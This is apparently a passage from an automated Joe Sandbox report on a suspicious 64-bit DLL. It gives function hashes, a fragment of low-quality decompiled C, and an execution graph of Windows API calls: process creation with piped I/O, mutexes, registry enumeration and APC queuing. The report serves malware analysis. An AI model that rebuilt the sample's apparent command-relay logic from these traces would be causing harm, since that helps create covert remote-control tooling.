                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeave
                  • String ID:
                  • API String ID: 2939682908-0
                  • Opcode ID: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction ID: a0890feeee0316dd0af96136dbcc6cf79a7537e396d31e91aa434a41704444e3
                  • Opcode Fuzzy Hash: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction Fuzzy Hash: 6D314232204B88C7D761CB5AE84439AF7A4F79CBD4F548115EE9983B64DF38C64ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E000000011800081F0(void* __edx, long long __rbx, signed short* __rcx, long long __rsi, signed int** __r8, intOrPtr* __r9, void* __r11) {
                  				signed int _t21;
                  				signed int _t28;
                  				signed int* _t38;
                  				int _t53;
                  				long long _t58;
                  				void* _t61;
                  				void* _t72;
                  				signed int* _t73;
                  				long _t75;
                  				long _t78;
                  				void* _t81;
                  
                  				 *((long long*)(_t61 + 8)) = __rbx;
                  				 *((long long*)(_t61 + 0x10)) = _t58;
                  				 *((long long*)(_t61 + 0x18)) = __rsi;
                  				_t21 =  *__rcx & 0x0000ffff;
                  				_t38 = __rbx + 4;
                  				r11d = __edx;
                  				r10d = 0x57;
                  				if (__r11 - _t38 <= 0) goto 0x800082e1;
                  				_t28 =  *(__rbx +  &(__rcx[1])) & 0x0000ffff;
                  				if (__r11 -  &(__rcx[2]) < 0) goto 0x800082e1;
                  				if (_t21 == 0) goto 0x800082e1;
                  				if (_t21 - 0x200 > 0) goto 0x800082e1;
                  				if (_t28 == 0) goto 0x800082e1;
                  				if (_t28 - 0x200 > 0) goto 0x800082e1;
                  				r15d = 0x404;
                  				HeapAlloc(_t81, _t78, _t75);
                  				_t73 = _t38;
                  				if (_t38 == 0) goto 0x800082db;
                  				memset(_t72, _t53);
                  				 *_t73 = (_t21 & 0x0000fff0) << 3;
                  				memcpy(??, ??, ??);
                  				memcpy(??, ??, ??);
                  				 *__r8 = _t73;
                  				 *__r9 = r15d;
                  				r10d = 0;
                  				goto 0x800082e1;
                  				r10d = 8;
                  				return r10d;
                  			}














                  0x1800081f0
                  0x1800081f5
                  0x1800081fa
                  0x180008213
                  0x18000821d
                  0x180008221
                  0x18000822a
                  0x180008236
                  0x18000823c
                  0x18000824b
                  0x180008253
                  0x180008260
                  0x180008264
                  0x180008268
                  0x18000826a
                  0x180008278
                  0x18000827e
                  0x180008284
                  0x18000828e
                  0x1800082b0
                  0x1800082b4
                  0x1800082ca
                  0x1800082cf
                  0x1800082d2
                  0x1800082d6
                  0x1800082d9
                  0x1800082db
                  0x180008300

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeapmemset
                  • String ID:
                  • API String ID: 609429373-0
                  • Opcode ID: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction ID: 28a7b8e95bc2ced4d8e1beef03e6e9b8fa3c41881149a4efc87acd56f6b93b28
                  • Opcode Fuzzy Hash: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction Fuzzy Hash: AA21E072204B9881EB95CF57E84039A7690FB89FC4F04C425FE8A17355EE38C759C308
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeaplstrlen
                  • String ID:
                  • API String ID: 2888080719-0
                  • Opcode ID: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction ID: d7cda782a7b16298d0386595c53ef50d9ac6af49b43f80025cb93dadd90a3a02
                  • Opcode Fuzzy Hash: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction Fuzzy Hash: 83219E72300B9891DB56DF17A9813E9B3A1F78CBD4F498521AE490B799DE38C68AC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CA7
                  • memset.NTDLL(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CC1
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CED
                  • InitializeCriticalSection.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008D3E
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: AllocHeap$CriticalInitializeLibraryLoadSectionmemset
                  • String ID:
                  • API String ID: 2387776105-0
                  • Opcode ID: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction ID: 4870de9647b4eba85a0def977afe88a726f62592237ec59ed4fc2a31fcf765aa
                  • Opcode Fuzzy Hash: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction Fuzzy Hash: 80315036200B5896EB56CF12E8143DA77A5F79CBD4F888126EE8D83795EF38D609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: AllocHeap_snprintflstrcpylstrlen
                  • String ID:
                  • API String ID: 2416262065-0
                  • Opcode ID: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction ID: cd8941c1faf9c1b72c5725e61722f5b4f1580fba6f0a1dbc367b270ebdb23bd2
                  • Opcode Fuzzy Hash: d259640750b129b37f8796bde76c5520b807ee9fb10f6e5ed3310e5deffcfd7e
                  • Instruction Fuzzy Hash: 83316B36604B888BD7A5CF16E454B9AB7A5F38CBC4F048126EE9E83714DF39D545CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: FreeHeap$ErrorLast
                  • String ID:
                  • API String ID: 2332451156-0
                  • Opcode ID: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction ID: 57d54ecd6ba6b12e4082159e9fbcbac62f64b62c5c275490acec5f9711af8689
                  • Opcode Fuzzy Hash: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction Fuzzy Hash: D5215E72200B8882EB97DB63D5413A973A5EB8DFC4F589115EE4D93799DF38CA89C300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalSection$AllocEnterHeapLeavememcpy
                  • String ID:
                  • API String ID: 224082080-0
                  • Opcode ID: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction ID: 6c58b3867655a66680f731ed639b6ca29fd0989e7b58f2a4007a8aeeb493b1ec
                  • Opcode Fuzzy Hash: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction Fuzzy Hash: 20112672604B5886E751CF02F888B9AB774F398BD5F958012EA9D43B54DF38C68AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: AllocHeaplstrlenmemcpymemset
                  • String ID:
                  • API String ID: 422472530-0
                  • Opcode ID: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction ID: bc1187ca6e9429620bd200782e7290a68718eb3a581ccfc4400d3cdfedcb2126
                  • Opcode Fuzzy Hash: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction Fuzzy Hash: 49014832214B8886EB45DF26A84039977A2F78CFC0F498121EE5943B15DF38E655C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:12.7%
                  Dynamic/Decrypted Code Coverage:97.8%
                  Signature Coverage:0%
                  Total number of Nodes:1113
                  Total number of Limit Nodes:63
                  execution_graph 6129 7ffa0ae612ae 6130 7ffa0ae612b3 GetConsoleScreenBufferInfo 6129->6130 6132 7ffa0ae612a3 6129->6132 6130->6132 6191 180002f24 HeapAlloc 6192 180002f6e memset CreatePipe 6191->6192 6204 180002f66 6191->6204 6193 180002fcb CreatePipe 6192->6193 6194 180002fbe GetLastError 6192->6194 6193->6194 6195 180002fe5 6193->6195 6194->6204 6205 180001d98 memset 6195->6205 6198 18000459c SetLastError 6199 180003014 6198->6199 6200 18000303e GetLastError 6199->6200 6202 18000304a 6199->6202 6200->6202 6200->6204 6201 18000459c SetLastError 6201->6202 6202->6201 6203 180003089 GetLastError 6202->6203 6202->6204 6203->6204 6206 1800089e4 3 API calls 6205->6206 6207 180001e43 6206->6207 6208 180001ec6 6207->6208 6209 180001e4b memcpy CreateProcessW 6207->6209 6208->6198 6208->6204 6210 180001eb6 HeapFree 6209->6210 6211 180001eae GetLastError 6209->6211 6210->6208 6211->6210 6286 7ffa0ae61030 6287 7ffa0ae61035 SetConsoleTextAttribute 6286->6287 6289 180008368 CreateEventA 6290 180008598 GetLastError 6289->6290 6291 1800083ae 6289->6291 6292 1800085a0 6290->6292 6293 18000459c SetLastError 6291->6293 6295 1800085aa CloseHandle 6292->6295 6296 1800085b0 6292->6296 6294 1800083c9 6293->6294 6294->6290 6297 1800083ea ResumeThread 6294->6297 6295->6296 6298 1800083f4 GetExitCodeProcess 6297->6298 6298->6290 6306 18000840b 6298->6306 6299 180008593 6299->6290 6299->6292 6300 18000841b PeekNamedPipe 6300->6290 6300->6306 6301 18000844c ReadFile 6301->6290 6301->6306 6303 1800084c6 WriteFile 6303->6290 6303->6306 6304 1800084ee WaitForMultipleObjects 6304->6292 6304->6306 6305 18000459c SetLastError 6305->6306 6306->6290 6306->6292 6306->6298 6306->6299 6306->6300 6306->6301 6306->6303 6306->6304 6306->6305 6307 18000854e WriteFile 6306->6307 6309 18000858b GetLastError 6306->6309 6310 180004258 6306->6310 6308 180008571 ResetEvent 6307->6308 6307->6309 6308->6298 6309->6299 6311 180004287 6310->6311 6312 18000459c SetLastError 6311->6312 6313 1800042fa 6311->6313 6312->6311 6313->6306 6133 7ffa0ae610b7 ReadConsoleA 6134 7ffa0ae610b0 6133->6134 6135 7ffa0ae610c1 ReadConsoleOutputA 6133->6135 6135->6134 6026 1800025ec SleepEx 6027 180002609 6026->6027 6028 18000261b 6026->6028 6027->6028 6029 180002612 WaitForSingleObject 6027->6029 6029->6028 6314 180007d6f 6315 180007d83 6314->6315 6316 180007d8c HeapFree 6315->6316 6317 180007d87 6315->6317 6316->6317 5040 7c1c6d 5042 7c1c29 5040->5042 5041 7c1c1e RtlAllocateHeap 5043 7c1c14 5041->5043 5042->5041 5042->5043 6114 7ffa0ae610e1 6115 7ffa0ae610e6 6114->6115 6116 7ffa0ae610b0 6114->6116 6115->6116 6117 7ffa0ae61236 SetConsoleCursorPosition 6115->6117 5165 180001334 5166 180001343 5165->5166 5167 180001357 5165->5167 5168 18000134f 5166->5168 5173 180004f1c HeapCreate 5166->5173 5184 180005578 5167->5184 5172 18000136a HeapDestroy 5172->5168 5174 180005069 5173->5174 5175 180004f5d 5173->5175 5174->5168 5176 180004ffc 5175->5176 5179 180004f8e HeapAlloc 5175->5179 5177 180005005 HeapDestroy 5176->5177 5178 180005010 HeapAlloc 5176->5178 5177->5174 5180 180005049 5178->5180 5181 180005039 HeapDestroy 5178->5181 5183 180004fb3 5179->5183 5193 18000508c HeapAlloc 5180->5193 5181->5174 5183->5176 5185 18000559a 5184->5185 5186 18000135e 5185->5186 5187 1800055b5 5185->5187 5188 1800055af SetEvent 5185->5188 5186->5168 5186->5172 5189 1800055bc Sleep 5187->5189 5190 1800055d0 5187->5190 5188->5187 5189->5189 5189->5190 5191 1800055d9 CloseHandle 5190->5191 5192 1800055df HeapFree 5190->5192 5191->5192 5192->5186 5194 180005419 5193->5194 5195 1800050e0 memset InitializeCriticalSection 5193->5195 5194->5174 5243 180008b44 GetModuleHandleA 5195->5243 5198 1800052f8 5200 180005578 4 API calls 5198->5200 5202 180005417 5200->5202 5202->5194 5203 18000459c SetLastError 5204 18000512e 5203->5204 5205 18000515b HeapAlloc 5204->5205 5206 180005150 GetLastError 5204->5206 5207 180005226 5205->5207 5208 18000518a RegOpenKeyW 5205->5208 5209 180005408 5206->5209 5207->5198 5212 180005234 memcpy 5207->5212 5210 180005216 HeapFree 5208->5210 5219 1800051b2 5208->5219 5209->5194 5209->5198 5210->5207 5211 1800051cf RegEnumKeyW 5213 1800051ee RegCloseKey 5211->5213 5211->5219 5258 180005ca4 5212->5258 5213->5210 5213->5212 5218 18000529a 5218->5198 5274 180006dcc 5218->5274 5219->5211 5219->5213 5344 180009110 5219->5344 5220 180005ca4 6 API calls 5220->5218 5223 1800052e2 5223->5198 5284 180008708 5223->5284 5224 1800052b8 5348 180003c24 HeapAlloc 5224->5348 5228 180003c24 2 API calls 5229 1800052d7 5228->5229 5229->5223 5230 1800052f3 5230->5198 5231 180005376 GetModuleHandleA 5230->5231 5232 180005393 5231->5232 5233 1800053fb 5231->5233 5235 18000459c SetLastError 5232->5235 5297 180002b60 5233->5297 5236 1800053a1 5235->5236 5237 1800053a9 GetCurrentThreadId 5236->5237 5238 1800053b9 5236->5238 5237->5238 5238->5206 5239 18000459c SetLastError 5238->5239 5240 1800053d8 5239->5240 5241 1800053dd QueueUserAPC 5240->5241 5242 1800053ee 5240->5242 5241->5242 5242->5194 5242->5206 5352 180007b94 5243->5352 5246 180008b81 GetModuleHandleA 5248 180007b94 3 API calls 5246->5248 5247 18000510d 5247->5198 5251 180007678 5247->5251 5249 180008b9d 5248->5249 5249->5247 5359 180002464 LoadLibraryA 5249->5359 5252 18000459c SetLastError 5251->5252 5253 1800076ae GetModuleHandleA 5252->5253 5255 1800076d5 5253->5255 5257 180005120 5253->5257 5256 18000459c SetLastError 5255->5256 5256->5257 5257->5203 5259 18000459c SetLastError 5258->5259 5260 180005cde 5259->5260 5261 180005ce5 CreateFileW 5260->5261 5262 180005d0b 5260->5262 5261->5262 5263 180005d18 RtlInitUnicodeString 5262->5263 5264 180005dcd GetLastError 5262->5264 5266 18000459c SetLastError 5263->5266 5265 18000527b 5264->5265 5265->5218 5265->5220 5267 180005d3c 5266->5267 5268 180005d41 NtQueryDirectoryFile 5267->5268 5269 180005d92 5267->5269 5268->5269 5270 180005d9b 5269->5270 5272 18000459c SetLastError 5269->5272 5271 180005dc2 CloseHandle 5270->5271 5271->5265 5273 180005db7 5272->5273 5273->5270 5273->5271 5275 1800089e4 3 API calls 5274->5275 5276 180006e17 5275->5276 5277 180006e21 lstrlenW 5276->5277 5278 1800052b1 5276->5278 5279 180006e38 lstrcmpiW 5277->5279 5280 180006e4f 5277->5280 5278->5223 5278->5224 5279->5280 5281 180006e7a HeapFree 5279->5281 5366 180002594 5280->5366 5281->5278 5285 180008759 5284->5285 5286 1800087f7 5285->5286 5376 1800030c8 5285->5376 5286->5230 5289 18000459c SetLastError 5290 1800087a9 5289->5290 5291 1800087ae CreateMutexW 5290->5291 5292 1800087c0 5290->5292 5291->5292 5293 1800087c8 GetLastError 5292->5293 5294 1800087e9 HeapFree 5292->5294 5295 1800087d5 CloseHandle 5293->5295 5296 1800087e0 5293->5296 5294->5286 5295->5294 5296->5294 5298 180002464 6 API calls 5297->5298 5299 180002ba5 5298->5299 5300 180002bd9 5299->5300 5302 180002464 6 API calls 5299->5302 5301 180002f0d 5300->5301 5435 180008c60 HeapAlloc 5300->5435 5301->5209 5304 180002bbc 5302->5304 5304->5300 5305 180002bc2 HeapFree 5304->5305 5305->5300 5306 180002ed2 5308 180002ee5 HeapFree 5306->5308 5309 180002ef8 5306->5309 5307 180002c13 5311 180002beb 5307->5311 5308->5309 5309->5301 5310 180002f01 HeapFree 5309->5310 5310->5301 5311->5306 5311->5307 5312 180002ec8 5311->5312 5385 1800022ac memset 5311->5385 5478 180002620 5312->5478 5317 180002c8a 5318 180002c8e 5317->5318 5319 18000459c SetLastError 5317->5319 5318->5317 5321 180002cc6 5319->5321 5320 180002cd1 5320->5321 5321->5312 5321->5320 5322 180002370 2 API calls 5321->5322 5323 180002d20 5322->5323 5324 180002d41 5323->5324 5398 180002668 lstrlenA HeapAlloc 5323->5398 5326 180002370 2 API calls 5324->5326 5327 180002d5f 5326->5327 5328 180002d63 5327->5328 5329 180002370 2 API calls 5327->5329 5328->5327 5330 180002dad 5329->5330 5331 180002db1 5330->5331 5332 180002370 2 API calls 5330->5332 5331->5330 5333 180002dfa 5332->5333 5334 180002dfe 5333->5334 5335 180002e40 5333->5335 5334->5335 5337 180002e16 GetSystemTimeAsFileTime 5334->5337 5409 180007dbc 5335->5409 5337->5335 5338 18000459c SetLastError 5340 180002e52 5338->5340 5340->5335 5340->5338 5341 180002e9e 5340->5341 5445 18000137c 5340->5445 5341->5312 5454 180007950 5341->5454 5345 18000914a 5344->5345 5347 1800091cd 5344->5347 5346 18000919e memcpy 5345->5346 5345->5347 5346->5347 5347->5219 5349 180003c66 5348->5349 5350 180003c9c 5348->5350 5351 180003c76 _snprintf 5349->5351 5350->5223 5350->5228 5351->5350 5351->5351 5353 180007beb 5352->5353 5356 180007d87 5352->5356 5354 180007bf9 RtlAllocateHeap 5353->5354 5353->5356 5355 180007c2a memset 5354->5355 5354->5356 5358 180007c69 5355->5358 5356->5246 5356->5247 5357 180007d8c HeapFree 5357->5356 5358->5356 5358->5357 5360 180002484 5359->5360 5361 1800024af GetLastError 5359->5361 5363 180007b94 3 API calls 5360->5363 5362 180002497 5361->5362 5362->5247 5364 180002491 5363->5364 5364->5362 5365 1800024a4 FreeLibrary 5364->5365 5365->5362 5367 1800025b8 5366->5367 5372 1800072a4 5367->5372 5373 1800072df 5372->5373 5374 1800072f7 memcpy 5373->5374 5375 180007310 5373->5375 5374->5375 5377 180003117 5376->5377 5378 18000310a lstrlenW 5376->5378 5379 18000311a HeapAlloc 5377->5379 5378->5379 5380 18000319c 5379->5380 5381 180003134 5379->5381 5380->5286 5380->5289 5382 180003154 5381->5382 5383 18000313c memcpy 5381->5383 5384 18000315c memcpy 5382->5384 5383->5382 5384->5380 5384->5382 5481 180001c00 lstrlenA HeapAlloc 5385->5481 5387 1800022fc 5388 180002348 5387->5388 5389 180001c00 4 API calls 5387->5389 5388->5312 5394 180002370 5388->5394 5390 18000230f 5389->5390 5390->5388 5391 180001c00 4 API calls 5390->5391 5392 18000232b 5391->5392 5392->5388 5484 180008d78 5392->5484 5395 180002385 5394->5395 5396 1800023a9 5395->5396 5518 1800094e0 5395->5518 5396->5317 5399 1800026c4 5398->5399 5400 180002749 5398->5400 5401 1800026e3 5399->5401 5402 1800026d4 lstrcpyA 5399->5402 5400->5324 5403 18000459c SetLastError 5401->5403 5402->5401 5404 1800026f9 5403->5404 5405 180002719 5404->5405 5406 1800026fe CreateThread 5404->5406 5407 180002721 FindCloseChangeNotification 5405->5407 5408 18000272c GetLastError HeapFree 5405->5408 5406->5405 5407->5400 5408->5400 5550 180001cb0 5409->5550 5411 180007e08 5412 180007e0c 5411->5412 5557 180008034 EnterCriticalSection LeaveCriticalSection HeapAlloc 5411->5557 5412->5411 5414 180007e3c 5415 180007fff 5414->5415 5416 180007e5e 5414->5416 5523 18000970c 5414->5523 5417 180007f3a 5415->5417 5418 1800045e8 4 API calls 5415->5418 5416->5414 5420 180007f91 5417->5420 5421 180007f68 GetSystemTimeAsFileTime 5417->5421 5418->5417 5423 180007fba HeapFree 5420->5423 5424 180007fdc 5420->5424 5421->5420 5425 180007f78 5421->5425 5427 180007fcc 5423->5427 5424->5340 5425->5420 5581 1800045e8 5425->5581 5426 180007ed8 5431 180007eef 5426->5431 5562 1800023b8 5426->5562 5427->5424 5587 180008bc4 5427->5587 5431->5415 5568 1800099f4 5431->5568 5434 180007fef HeapFree 5434->5415 5436 180008cb9 memset 5435->5436 5443 180008d09 5435->5443 5437 180002464 6 API calls 5436->5437 5438 180008cde 5437->5438 5439 180008ce4 HeapAlloc 5438->5439 5441 180008cfe 5438->5441 5440 180008d0b 5439->5440 5439->5441 5444 180008d3a InitializeCriticalSection 5440->5444 5442 180002620 2 API calls 5441->5442 5442->5443 5443->5311 5444->5443 5446 180001605 5445->5446 5451 1800013b1 5445->5451 5446->5340 5447 180001531 memcpy 5447->5451 5448 180001593 HeapAlloc 5449 1800015aa memcpy 5448->5449 5448->5451 5450 1800015cb 5449->5450 5941 180005748 5450->5941 5451->5446 5451->5447 5451->5448 5455 180007959 5454->5455 5456 180002eba HeapFree 5454->5456 5457 180007a57 DeleteCriticalSection 5455->5457 5458 18000798d SetEvent 5455->5458 5456->5312 5457->5456 6020 180008308 5458->6020 5461 1800079a3 WaitForSingleObject CloseHandle 5462 1800079ba 5461->5462 5463 1800079c3 CloseHandle 5462->5463 5464 1800079c9 EnterCriticalSection 5462->5464 5463->5464 5465 1800079df 5464->5465 5466 1800079f0 LeaveCriticalSection 5465->5466 5468 180008308 SetLastError 5465->5468 5467 180007a09 5466->5467 5469 180007a01 Sleep 5467->5469 5470 180007a0e 5467->5470 5468->5465 5469->5467 5471 180007a15 Sleep 5470->5471 5472 180007a26 5470->5472 5471->5471 5471->5472 5473 180007a35 5472->5473 5474 180007a2f CloseHandle 5472->5474 5475 180007a44 5473->5475 5476 180007a3e CloseHandle 5473->5476 5474->5473 5475->5457 5477 180007a4c HeapFree 5475->5477 5476->5475 5477->5457 5479 180002641 HeapFree 5478->5479 5480 18000264c HeapFree 5478->5480 5479->5480 5482 180001c6d 5481->5482 5483 180001c4d memcpy memset 5481->5483 5482->5387 5483->5482 5485 180002370 2 API calls 5484->5485 5486 180008dc8 5485->5486 5487 1800090ee 5486->5487 5488 180008df9 lstrlenA HeapAlloc 5486->5488 5506 180008f3e HeapFree 5486->5506 5487->5388 5490 180008e20 memcpy 5488->5490 5488->5506 5492 180008e3c 5490->5492 5491 180008f85 5493 180002370 2 API calls 5491->5493 5495 180008e50 lstrlenA HeapAlloc 5492->5495 5504 180008e7b 5492->5504 5494 180008fa3 5493->5494 5494->5487 5498 180002370 2 API calls 5494->5498 5495->5504 5496 180008eda 5515 18000958c EnterCriticalSection 5496->5515 5497 180008f4f HeapFree 5497->5506 5501 180008ff3 5498->5501 5503 18000905e 5501->5503 5507 18000958c 2 API calls 5501->5507 5508 180002370 2 API calls 5503->5508 5504->5496 5504->5497 5505 180008f1d HeapFree HeapFree 5505->5506 5506->5487 5506->5491 5509 180009018 memcpy 5507->5509 5512 18000907d 5508->5512 5510 180009043 LeaveCriticalSection HeapFree 5509->5510 5511 18000902f memset 5509->5511 5510->5503 5511->5510 5512->5487 5513 18000958c 2 API calls 5512->5513 5514 1800090b2 GetSystemTimeAsFileTime LeaveCriticalSection 5513->5514 5514->5487 5516 1800095a2 Sleep 5515->5516 5517 180008eeb LeaveCriticalSection 5515->5517 5516->5516 5516->5517 5517->5505 5517->5506 5519 180009514 5518->5519 5520 180009550 5518->5520 5519->5520 5521 18000951c HeapAlloc 5519->5521 5520->5396 5521->5520 5522 180009534 memcpy 5521->5522 5522->5520 5524 180009751 5523->5524 5525 180009758 EnterCriticalSection LeaveCriticalSection 5523->5525 5526 1800045e8 4 API calls 5524->5526 5527 1800097e8 5525->5527 5531 18000977f 5525->5531 5526->5525 5528 180007ec3 HeapFree 5527->5528 5592 180006108 HeapAlloc 5527->5592 5528->5426 5528->5431 5535 180001c00 4 API calls 5531->5535 5533 180009833 EnterCriticalSection LeaveCriticalSection 5537 18000986b 5533->5537 5538 18000985f 5533->5538 5534 18000995c HeapFree 5534->5528 5536 1800097d1 5535->5536 5536->5527 5541 180009882 lstrlenA lstrlenA 5537->5541 5542 18000993c HeapFree HeapFree 5537->5542 5539 180001c00 4 API calls 5538->5539 5540 180009866 5539->5540 5540->5537 5543 180001c00 4 API calls 5541->5543 5542->5534 5544 1800098a7 5543->5544 5545 18000992e HeapFree 5544->5545 5546 1800098af memcpy 5544->5546 5545->5542 5606 1800088b4 5546->5606 5551 180001cec EnterCriticalSection 5550->5551 5552 180001d7d 5550->5552 5553 180001d0c 5551->5553 5552->5411 5554 180001d74 LeaveCriticalSection 5553->5554 5555 180001d14 HeapAlloc 5553->5555 5554->5552 5556 180001d2a 5555->5556 5556->5554 5558 180008129 5557->5558 5559 1800080aa memset EnterCriticalSection 5557->5559 5558->5414 5560 180008111 LeaveCriticalSection 5559->5560 5561 1800080d5 5559->5561 5560->5558 5561->5560 5561->5561 5563 180002446 5562->5563 5566 1800023e6 5562->5566 5563->5431 5564 1800023eb EnterCriticalSection 5564->5566 5565 180002421 LeaveCriticalSection 5565->5566 5567 18000242f HeapFree 5565->5567 5566->5563 5566->5564 5566->5565 5567->5566 5569 180009a3e 5568->5569 5570 180007f30 5569->5570 5571 1800094e0 2 API calls 5569->5571 5570->5417 5570->5434 5572 180009a73 5571->5572 5572->5570 5573 180009aa4 5572->5573 5890 1800081f0 5572->5890 5575 180009b36 memset HeapFree 5573->5575 5895 180006eb0 5573->5895 5575->5570 5578 180009b16 5580 180009b1b memset HeapFree 5578->5580 5579 180009ae8 memcpy HeapFree 5579->5580 5580->5575 5582 18000958c 2 API calls 5581->5582 5583 18000460b 5582->5583 5584 180004616 GetSystemTimeAsFileTime 5583->5584 5585 18000462c LeaveCriticalSection 5583->5585 5584->5585 5585->5420 5588 180008be1 EnterCriticalSection 5587->5588 5589 180008c2e 5587->5589 5590 180008c14 LeaveCriticalSection 5588->5590 5589->5424 5590->5589 5593 180006163 5592->5593 5594 18000627d 5592->5594 5602 1800061ec 5593->5602 5619 180006008 lstrlenA RtlAllocateHeap 